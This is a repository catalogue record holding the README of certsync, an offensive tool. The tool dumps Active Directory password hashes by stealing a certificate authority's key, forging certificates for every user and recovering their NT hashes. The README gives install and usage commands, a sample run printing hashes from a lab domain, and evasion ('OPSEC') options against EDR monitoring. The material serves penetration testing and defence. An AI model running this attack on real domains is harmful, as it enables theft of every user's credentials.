{"id":20411052,"url":"https://github.com/zblurx/certsync","last_synced_at":"2025-05-16T03:02:27.565Z","repository":{"id":65613788,"uuid":"595679998","full_name":"zblurx/certsync","owner":"zblurx","description":"Dump NTDS with golden certificates and UnPAC the hash","archived":false,"fork":false,"pushed_at":"2024-03-20T10:58:15.000Z","size":34,"stargazers_count":633,"open_issues_count":2,"forks_count":67,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-10T01:06:15.921Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zblurx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-01-31T15:37:12.000Z","updated_at":"2025-04-17T02:07:26.000Z","dependencies_parsed_at":"2023-02-18T07:15:56.649Z","dependency_job_id":"f4021fbf-d83c-4024-91e0-7c34e909f4d3","html_url":"https://github.com/zblurx/certsync","commit_stats":{"total_commits":5,"total_committers":4,"mean_commits":1.25,"dds":0.6,"last_synced_commit":"a8ba40680c6393063411694017826d09009325a3"},"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zblurx","download_url":"https://codeload.github.com/zblurx/certsync/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459078,"owners_count":22074604,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-15T05:49:23.564Z","updated_at":"2025-05-16T03:02:22.545Z","avatar_url":"https://github.com/zblurx.png","language":"Python","funding_links":[],"categories":["Red Team"],"sub_categories":["Credential Dumping"],"readme":"# certsync\n\n`certsync` is a new technique in order to dump NTDS remotely, but this time **without DRSUAPI**: it uses [golden certificate](https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate) and [UnPAC the hash](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash).\nIt works in several steps:\n\n1. Dump user list, CA informations and CRL from LDAP\n2. Dump CA certificate and private key\n3. Forge offline a certificate for every user\n4. UnPAC the hash for every user in order to get nt and lm hashes\n\n```text\n$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12\n[*] Collecting userlist, CA info and CRL on LDAP\n[*] Found 13 users in LDAP\n[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)\n[*] Dumping CA certificate and private key\n[*] Forging certificates for every users. This can take some time...\n[*] PKINIT + UnPAC the hashes\nESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::\nESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::\nESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::\nESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::\nESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::\nESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::\nESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::\nESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::\nESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::\nESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::\n```\n\nContrary to what we may think, the attack is not at all slower.\n\n## Table of Contents\n\n- [certsync](#certsync)\n  - [Table of Contents](#table-of-contents)\n  - [Installation](#installation)\n  - [Usage](#usage)\n  - [Why](#why)\n  - [Requirements](#requirements)\n  - [Limitations](#limitation)\n  - [OPSEC](#opsec)\n  - [Credits](#credits)\n\n## Installation\n\nLocally:\n\n```text\ngit clone https://github.com/zblurx/certsync\ncd certsync\npip install .\n```\n\nFrom Pypi:\n\n```text\npip install certsync\n```\n\nFrom BlackArch:\n\n```text\npacman -S certsync\n```\n\nAll OS distribution packages:\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/certsync-ntds.svg)](https://repology.org/project/certsync-ntds/versions)\n\n## Usage\n\n```text\n$ certsync -h\nusage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]\n                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]\n                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]\n\nDump NTDS with golden certificates and UnPAC the hash\n\noptions:\n  -h, --help            show this help message and exit\n  -debug                Turn DEBUG output ON\n  -outputfile OUTPUTFILE\n                        base output filename\n\nCA options:\n  -ca-pfx pfx/p12 file name\n                        Path to CA certificate. If used, will skip backup of CA certificate and private key\n  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP\n\nauthentication options:\n  -d domain.local, -domain domain.local\n                        Domain name\n  -u username, -username username\n                        Username\n  -p password, -password password\n                        Password\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid\n                        credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)\n  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n\nconnection options:\n  -scheme ldap scheme\n  -ns nameserver        Nameserver for DNS resolution\n  -dns-tcp              Use TCP instead of UDP for DNS queries\n  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n\nOPSEC options:\n  -ldap-filter LDAP_FILTER\n                        ldap filter to dump users. Default is (\u0026(|(objectCategory=person)(objectClass=computer))(objectClass=user))\n  -template cert.pfx    base template to use in order to forge certificates\n  -timeout timeout      Timeout between PKINIT connection\n  -jitter jitter        Jitter between PKINIT connection\n  -randomize            Randomize certificate generation. Takes longer to generate all the certificates\n```\n\n## Why\n\nDSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, `certsync` does not require to use a Domain Administrator, it only require a CA Administrator.\n\n## Requirements\n\nThis attack needs:\n- A configured Entreprise CA on an ADCS server in the domain,\n- PKINIT working,\n- An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.\n\n## Limitations\n\nSince we cannot PKINIT for users that are revoked, we cannot dump thier hashes.\n\n## OPSEC\n\nSome options were added to customize the behaviour of the tool:\n- `-ldap-filter`: change the LDAP filter used to select usernames to certsync.\n- `-template`: use an already delivered certificate to mimic it when forging users certificates.\n- `-timeout` and `-jitter`: change timeout between PKINIT authentication requests.\n- `-randomize`: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer. \n\n## Credits\n\n- [Olivier Lyak](https://twitter.com/ly4k_) for all his work on ADCS and [certipy](https://github.com/ly4k/Certipy).\n- [Benjamin Delpy](https://twitter.com/gentilkiwi) for the unPAC the hash technique.\n- [Will Schroeder](https://twitter.com/harmj0y) and [Lee Christensen](https://twitter.com/tifkin_) for [Certified Pre-Owned](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) and [Certify](https://github.com/GhostPack/Certify).\n- [Mayfly](https://twitter.com/M4yFly) for his great lab: [GOAD](https://github.com/Orange-Cyberdefense/GOAD).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzblurx%2Fcertsync","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzblurx%2Fcertsync","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzblurx%2Fcertsync/lists"}